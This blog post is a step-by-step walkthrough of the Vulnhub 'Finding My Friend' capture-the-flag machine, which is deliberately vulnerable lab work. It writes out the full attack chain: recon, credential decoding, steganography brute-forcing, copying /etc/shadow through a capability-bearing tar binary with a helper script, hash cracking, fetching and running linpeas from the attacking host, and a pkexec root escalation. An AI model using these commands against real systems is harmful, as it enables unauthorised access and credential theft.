In this blog post, we provide a comprehensive walkthrough of the Finding My Friend CTF from Vulnhub.
After downloading the CTF from Vulnhub, we import it and disable the serial port in the VM settings so that the machine will boot.
Note that we also set the network adapter to NAT Network, the same network as our Kali virtual machine (the attacking machine). This ensures that both machines are on the same subnet.
Next, we find the IP address of the vulnerable machine from the attacking machine's terminal using netdiscover. Always pass the subnet the two machines share: sudo netdiscover -r 10.0.2.0/24
We see that the target machine has the IP address 10.0.2.6. We then use nmap to find open ports and service versions: nmap -sV 10.0.2.6
From the nmap scan we see three open ports: 21/ftp, 22/ssh and 80/http. We also note the version each service reports, as they come in handy during reconnaissance.
Opening http://10.0.2.6:80 in the browser, we see this:
We scroll down the page to look for a flag and also inspect the page source. There are no flags here.
Since we couldn't find any flags, let's do some directory busting with dirb: dirb http://10.0.2.6:80 /usr/share/wordlists/dirb/common.txt
The busting finds three paths: /friend, /images and /index.html. We go back to the browser and access each of them.
Accessing /friend
We note the conversation on the browser and notice the last statement below:
Then we inspect the page source to see if we can find anything.
We find a string commented out in the page source, NjMgNjEgNzAgNzQgNzUgNzIgNjUgM2EgNjggNzUgNmUgNzQgNjkgNmUgNjc=, which happens to be base64 encoded (the trailing = padding and the A-Z/a-z/0-9 alphabet are the giveaway if you are not familiar with base64).
Now we go over to the terminal and decode the string: echo NjMgNjEgNzAgNzQgNzUgNzIgNjUgM2EgNjggNzUgNmUgNzQgNjkgNmUgNjc= | base64 -d
Decoding the string gives a space-separated hex string. We can decode the hex using CyberChef (or pipe it through xxd -r -p on the terminal).
We get the credential capture:hunting. Now let's connect to the FTP server on port 21 with the username capture and the password hunting: ftp 10.0.2.6
As the screenshot shows, the login was successful. We now look for sensitive files on the FTP server. Using ls -la (which also lists hidden dot files) we find the following:
We use the get command to download each file to our attacking machine: get <filename>
Next we inspect these files on our machine.
flag1.txt just contains the string tryhackme{Th1s1sJustTh3St4rt}, which is not useful to us.
note.txt contains the string "I have an image but I'm not able to open it. Can you help me to open it?". This points us to the hidden image .get.jpg seen in the listing above.
We open the image with xdg-open .get.jpg and see that it is a map image.
Given the hint in note.txt, we suspect data is hidden inside the map image (steganography). Let's use stegcracker, which wraps steghide and brute-forces the passphrase from a wordlist (rockyou.txt by default): stegcracker .get.jpg
We see that the passphrase used for the steganography is pollito and that the extracted data was written to .get.jpg.out. Now let's view the content.
We see that the hidden content is Morse code. We can decode it using CyberChef.
Decoding the Morse code gives us the credential JOHN:BOOGIEWOOGIE. This could be a credential for a system user, so let's try to connect via SSH (use the credentials in lower case): ssh john@10.0.2.6
We now have access as john via SSH. Next we look to gain root, starting by looking for sensitive files as john.
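The two decodes used so far, base64-wrapped hex for the FTP credential and Morse for the SSH credential, done entirely on the terminal, as an added example that is not part of the original write-up. The Morse input below is reconstructed from the decoded credential the post reports (the contents of .get.jpg.out are not shown), and the helper names are ours. The hex decoder uses only POSIX printf, so it works even where xxd is not installed.

```shell
#!/bin/sh
# Added example: terminal-only decoders for the two credentials in this box.

# Turn "63 61 70 ..." into bytes using only POSIX printf (no xxd needed):
# each hex pair becomes an octal escape that printf understands.
hex_to_ascii() {
  for pair in $1; do
    printf "\\$(printf '%03o' "$((0x$pair))")"
  done
  echo
}

# base64 -> space-separated hex -> text (the /friend page-source comment).
decode_b64_hex() {
  hex_to_ascii "$(printf '%s' "$1" | base64 -d)"
}

# Morse -> text. Letters are space-separated, words are separated by "/".
# Unknown symbols become "?" so a bad transcription is visible, not silent.
morse_decode() {
  out=""
  set -f   # no pathname expansion while we split the symbols
  for sym in $1; do
    case "$sym" in
      .-) c=A ;; -...) c=B ;; -.-.) c=C ;; -..) c=D ;; .) c=E ;;
      ..-.) c=F ;; --.) c=G ;; ....) c=H ;; ..) c=I ;; .---) c=J ;;
      -.-) c=K ;; .-..) c=L ;; --) c=M ;; -.) c=N ;; ---) c=O ;;
      .--.) c=P ;; --.-) c=Q ;; .-.) c=R ;; ...) c=S ;; -) c=T ;;
      ..-) c=U ;; ...-) c=V ;; .--) c=W ;; -..-) c=X ;; -.--) c=Y ;;
      --..) c=Z ;; ---...) c=: ;; /) c=' ' ;; *) c='?' ;;
    esac
    out="$out$c"
  done
  set +f
  printf '%s\n' "$out"
}

# Split user:pass so the pieces can go straight into ftp/ssh.
cred_user() { printf '%s\n' "${1%%:*}"; }
cred_pass() { printf '%s\n' "${1#*:}"; }

# Usage with the strings from this box (Morse reconstructed, see lead-in):
decode_b64_hex 'NjMgNjEgNzAgNzQgNzUgNzIgNjUgM2EgNjggNzUgNmUgNzQgNjkgNmUgNjc='
morse_decode '.--- --- .... -. ---... -... --- --- --. .. . .-- --- --- --. .. .'
```

The colon is the one non-letter symbol needed here (---...); anything the table does not know prints as ? rather than being dropped, which is what you want when transcribing Morse by eye from a text dump.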
Accessing the files found:
flag2.txt contains the string tryhackme{gI33fuIbutM0r3t0gO} which isn't quite useful to us.
clue.txt gives the message You need to find which college is she studying.
Hint: Her brother parth knows that.
Let's see if there is a user called parth.
There is a home directory for parth; however, we do not have permission to access it.
Now we try to find a way around this. Since it looks like we have reached a dead end, let's look for binaries with file capabilities set, using: getcap -r / 2>/dev/null
The first file listed, /etc/fonts/tar, carries a capability that bypasses file read permission checks and directory read and execute permission checks (this is what CAP_DAC_READ_SEARCH grants; see the capabilities man page in the references). A tar binary with that capability can read any file on the system regardless of its mode bits, so we can archive /etc/shadow into a location we own:
cd /etc && /etc/fonts/tar -cf /home/john/shadowcopy.tar shadow
The member name shadow is relative, so you must be in /etc when running this command (alternatively, pass -C /etc to tar instead of changing directory).
Now let's verify that shadowcopy.tar exists in /home/john.
We extract it with tar -xvf shadowcopy.tar to get the shadow file, then pull parth's hash line: grep parth shadow
We copy parth's hash line into a file and crack it with john the ripper and a wordlist.
Parth's password is johnnydepp.
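The capability-assisted read and the hash extraction above, as an added example that is not from the original write-up. It runs the same tar -C trick against a constructed shadow file in a temporary directory using the ordinary tar, so it runs anywhere; on the target you would pass /etc/fonts/tar and /etc instead, as the comment at the bottom shows. The function names and the placeholder hash are ours.

```shell
#!/bin/sh
# Added example: archive a root-only file with a capability-bearing tar,
# then carve out one user's shadow line for john the ripper.

# grab_shadow_entry TARBIN SRCDIR FILE USER OUTDIR
# TARBIN is the tar that carries CAP_DAC_READ_SEARCH (/etc/fonts/tar on the
# target); the capability lets it open FILE even though our user cannot.
grab_shadow_entry() {
  tarbin=$1; srcdir=$2; file=$3; user=$4; outdir=$5
  # -C makes tar read FILE relative to SRCDIR, so no cd into /etc is needed.
  # OUTDIR must be a directory we own, given as an absolute path.
  "$tarbin" -C "$srcdir" -cf "$outdir/shadowcopy.tar" "$file" || return 1
  # The archive is ours now, so the plain tar can extract it.
  tar -C "$outdir" -xf "$outdir/shadowcopy.tar" || return 1
  grep "^$user:" "$outdir/$file"
}

# Name the crypt(3) scheme from the hash prefix before handing it to john.
shadow_hash_type() {
  case "$1" in
    '$6$'*) echo sha512crypt ;;
    '$5$'*) echo sha256crypt ;;
    '$y$'*|'$7$'*) echo yescrypt ;;
    '$1$'*) echo md5crypt ;;
    *) echo unknown ;;
  esac
}

# demo: the same flow against a constructed shadow file, using the system tar.
demo() {
  tmp=$(mktemp -d) || return 1
  mkdir "$tmp/etc" "$tmp/out"
  # Constructed placeholder entries; the hash value is not a real one.
  printf '%s\n' 'root:*:19000:0:99999:7:::' \
    'parth:$6$saltsalt$FAKEHASHFORDEMO:19000:0:99999:7:::' > "$tmp/etc/shadow"
  entry=$(grab_shadow_entry tar "$tmp/etc" shadow parth "$tmp/out") || return 1
  # Only the hash field goes to john:  john --wordlist=<list> parth.hash
  printf '%s\n' "$entry" | cut -d: -f2 > "$tmp/out/parth.hash"
  printf '%s %s\n' "$(shadow_hash_type "$(cat "$tmp/out/parth.hash")")" "$entry"
  rm -rf "$tmp"
}

demo
# On the target, as john:
#   grab_shadow_entry /etc/fonts/tar /etc shadow parth /home/john > parth.shadow
```

Checking the hash prefix first tells you which john format you are dealing with and roughly how slow the crack will be; the crypt(3) schemes are all salted, so only a wordlist attack is realistic on a CTF box.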
Now we switch to the user parth with su parth.
We get a clue from honey.txt.
We reach yet another dead end here. We try to access the "..." folder, but still cannot do anything with it. It is time to bring in linpeas to find what we can exploit to gain root.
On the attacking machine we serve the script with python3 -m http.server 5500, then on the target machine we download linpeas.sh from that server (for example with wget http://<attacking-ip>:5500/linpeas.sh).
Next, we make the script executable with chmod +x linpeas.sh and run it with ./linpeas.sh. Among its findings it flags pkexec.
Head over to the Linux Privsec link in the references to see how pkexec is exploited.
Now we try to become root with the command pkexec /bin/bash. However, we get an error: pkexec asks polkit to authenticate us, and a plain SSH session has no polkit authentication agent to prompt for the password.
We can fix this and gain root by using two SSH sessions as parth.
In session 1, run echo $$ to get the PID of that shell.
In session 2, run pkttyagent --process <session_1_pid>, which registers a text-mode authentication agent on behalf of session 1.
Back in session 1, run pkexec /bin/bash.
Session 2 then prompts us to authenticate; we enter parth's password and the authentication succeeds.
Returning to session 1, we have a root shell on the machine (confirm with id).
Disclaimer: This solution is provided solely for educational and practical purposes. It is intended to demonstrate the techniques involved in solving cybersecurity challenges and to encourage ethical hacking practices. Any misuse of this information is strictly prohibited and may have legal consequences.
References
Linux Capabilities - https://man7.org/linux/man-pages/man7/capabilities.7.html
An Introduction to Linux Capabilities - https://earthly.dev/blog/intro-to-linux-capabilities/
Linux Capabilities - https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities
Linux Privsec - https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2